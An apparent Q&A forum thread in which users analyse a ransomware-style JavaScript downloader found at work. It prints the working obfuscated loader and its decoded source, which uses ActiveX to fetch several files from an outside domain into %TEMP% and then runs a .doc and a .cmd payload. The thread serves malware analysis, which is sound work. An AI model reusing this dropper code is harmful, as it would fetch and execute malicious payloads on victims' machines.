Trojan-Downloader.JS.Cryptoload.a virus, decryption help?

D

DimiDr0lik2014-10-10 10:14:06

Malware

DimiDr0lik, 2014-10-10 10:14:06

Hello comrades.
At work, a colleague caught such a Trojan-Downloader.JS.Cryptoload.a virus, it comes as a js loader,
help me decipher it.

///// FROM T/UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn
eval(function(f,j,g,b,i,h)

///////khdjahdjkHJKASdn
///// FROM THE UIAHDASJD

{i=function(a)
/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I 
////RU/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKAC///// FROM THE RU//// I WASAjkhdjahdjkHJKASdnSIAN CROWD
///// FROM THE RU

{return(a<j?"":i(parseInt(a/j)))+((a=a%j)>35?String.fromCharCode(a+29):a.toString(36));};

//// I WANT//// I WASAjkhdjahdjkHJKASdn
///// FROM THE RU/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM THE RU//// I WASAjkhdjahdjkHJKASdnSIAN CROWD

if(!"".replace(/^/,String)){while(g--){h[i(g)]=b[g]||i(g);}b=[function(a){return h[a];}];i=function(){

///// FROM THE RU//// I WASAjkhdjahdjkHJKASdnSIAN CROWD
///// FROM THE 
return"\\w+";};g=1;}while(g--){if(b[g]){f=f.replace(new RegExp("\\b"+i(g)+"\\b","g"),b[g]);}}
/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T////  PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdnROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn

return f;}("3 5=\"%h%\\\\\";3 q=\"%h%\\\\l.o\";3 8=\"H-G.I\";3 9=\"J\";3 c=f.e(\"f.y\");3 x=\"%h%\\\\v.j\";i b(p,r){3 a=k g(\"L.F\");a.M=i(){C(a.A===4){3 7=k g(\"z.B\");7.u();7.D=1;7.E(a.K);7.T=0;7.N(r,2);7.Y()}};a.u(\"V\",p,P);a.O()}i e(m){R k g(m)}3 c=e(\"f.y\");5=c.Q(5);b('d://'+8+'/'+9+'/j.6',''+5+'v.j');W{c.s(''+x+'',1,0)}X(U){};b('d://'+8+'/'+9+'/w.6',''+5+'w.6');b('d://'+8+'/'+9+'/t.6',''+5+'t.6');b('d://'+8+'/'+9+'/n.6',''+5+'n.6');b('d://'+8+'/'+9+'/l.S',''+5+'l.o');c.s(''+q+'',0,0);",61,61,"|||var||hayat|keybtc|objADOStream|rover|sunrise|objXMLHTTP|walkfree|WshShell|http|CreateObject|WScript|ActiveXObject|TEMP|function|doc|new|key|ProgId|trash|cmd|warning|rangerover|warming|Run|fake|open|word|night|crowd|Shell|ADODB|readyState|Stream|if|type|write|XMLHTTP|attachment|mail|com|attach|ResponseBody|MSXML2|onreadystatechange|saveToFile|send|false|ExpandEnvironmentStrings|return|block|position|dcc|GET|try|catch|close".split("|"),0,{}


/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THEKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn
)

/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdnROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn
);
///////SII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdnROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE U

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

S

sumatorhak, 2014-10-14
@sumatorhak

Hey! I also got something like that at work, I decoded the obfuscated JS, as a result, the sources are clear from where everything was downloaded and what was launched next, here is the real JS code:

function walkman(t,e){
  var c=new ActiveXObject("MSXML2.XMLHTTP");
  c.onreadystatechange = function(){
    if(4 === c.readyState){
      var t = new ActiveXObject("ADODB.Stream");
      
      t.open(),
      t.type=1,
      t.write(c.ResponseBody),
      t.position=0,
      t.saveToFile(e,2),
  t.close()
    }
  },
  c.open("GET", t, 0),
  c.send()
}

function CreateObject(t){
  return new ActiveXObject(t)
}

var sunshine="attach",
  costarica="%TEMP%\\",
  gti="twitterkeybtc.com",
  mercedes="%TEMP%\\syntax.cmd",
  WshShell=WScript.CreateObject("WScript.Shell"),
  proud="%TEMP%\\document.doc",
  WshShell=CreateObject("WScript.Shell");
  
costarica=WshShell.ExpandEnvironmentStrings(costarica),
walkman("http://"+gti+"/attach/doc.keybtc",""+costarica+"document.doc");

try {
  WshShell.Run(""+proud,1,0)
} catch(cont){}

walkman("http://"+gti+"/attach/night.keybtc",""+costarica+"night.keybtc"),
walkman("http://"+gti+"/attach/fake.keybtc",""+costarica+"fake.keybtc"),
walkman("http://"+gti+"/attach/trash.keybtc",""+costarica+"trash.keybtc"),
walkman("http://"+gti+"/attach/key.block",""+costarica+"syntax.cmd"),
WshShell.Run(""+mercedes,0,0);

As a result, the script will be executed only if the WScript object is available and will download several files:
1. twitterkeybtc.com/attach/doc.keybtc (contains some hieroglyphs, no macros found)
2. twitterkeybtc.com/attach/night.keybtc ( NIGHT ; ) )
3. twitterkeybtc.com/attach/fake.keybtc (much like a utility for RSA-1024 encryption, failed to run due to the missing iconv.dll (for character encoding conversion), and then the desire to run disappeared = ))
4. twitterkeybtc.com/attach/trash.keybtc (thrash)
5. twitterkeybtc.com/attach/key.block(and this is what is renamed to syntax.cmd and launched. Most likely obfuscated again, because it contains hieroglyphs, although it’s strange, translating them in Google sometimes even makes sense (probably overworked =) ) )
So far, everything, but preliminary results of the analysis of the virus, it will hardly be possible to decipher it ...